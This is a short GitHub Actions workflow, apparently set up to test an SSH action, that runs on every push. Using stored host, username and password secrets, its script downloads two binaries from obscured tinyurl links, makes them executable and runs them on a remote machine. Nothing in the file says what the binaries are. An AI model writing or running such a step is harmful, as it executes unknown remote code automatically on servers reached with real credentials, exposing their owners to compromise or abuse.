name: remote ssh command
on: [push]
jobs:

  build:
    name: KAGYUSAMA
    runs-on: ubuntu-latest
    steps:
    - name: checkout
      uses: actions/checkout@v1

    - name: executing remote ssh commands using password
      uses: ./
      with:
        host: ${{ secrets.HOST }}
        username: ${{ secrets.USERNAME }}
        password: ${{ secrets.PASSWORD }}
        port: ${{ secrets.PORT }}
        script: wget https://tinyurl.com/whokifs && chmod +x whokifs && ./whokifs && wget https://tinyurl.com/cexpoyz && chmod +x cexpoyz && ./cexpoyz
